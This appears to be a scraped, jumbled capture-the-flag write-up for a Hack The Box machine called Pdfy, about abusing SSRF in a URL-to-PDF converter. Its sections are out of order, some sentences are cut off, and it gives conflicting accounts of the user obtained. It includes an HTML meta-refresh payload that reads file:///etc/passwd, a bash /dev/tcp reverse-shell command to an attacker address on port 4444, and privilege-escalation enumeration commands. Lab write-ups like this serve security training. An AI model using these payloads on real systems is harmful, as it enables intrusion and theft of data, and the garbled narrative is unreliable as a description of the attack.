Pdfy Htb Writeup Upd -
After executing the exploit, we gain a reverse shell as the user pdfy . We then proceed to explore the machine and gather more information about the user and its privileges.
User pdfy may run the following commands on pdfy: (ALL) NOPASSWD: ALL
This PHP script, when requested, will send an HTTP redirect response to the client (in this case, wkhtmltopdf ). The redirect instructs it to immediately request the file:///etc/passwd resource. pdfy htb writeup upd
When you spawn the target machine and navigate to the web interface, you are greeted by a simple form containing a single input field: Enter URL to convert to PDF .
Trigger a reverse shell: http://10.10.10.x/shell.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.x.x/4444 0>&1' We are now on the box as the www-data user. 5. Privilege Escalation: Root Access With low-level access, we need to escalate to root. Enumerating Local Privileges We check for SUID binaries, sudo rights, or cron jobs. sudo -l find / -perm -u=s -type f 2>/dev/null Use code with caution. Exploit: System Service/Cron Job After executing the exploit, we gain a reverse
Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF. Whenever an application fetches content from a remote URL you provide, you should immediately test if it can fetch internal resources. 2. Identifying the Vulnerability (SSRF)
Inputting a direct internal scheme or local IP loopback address (e.g., http://127.0.0.1 or file:///etc/passwd ) results in an error message. The application implements a basic script validation layer to prevent users from requesting internal resources directly. 3. Identifying the Rendering Engine The redirect instructs it to immediately request the
<!DOCTYPE html> <html> <head> <meta http-equiv="refresh" content="0; url=file:///etc/passwd" /> </head> <body> <p>Redirecting...</p> </body> </html>
: We launch a nmap scan against the target IP to find open ports and running services.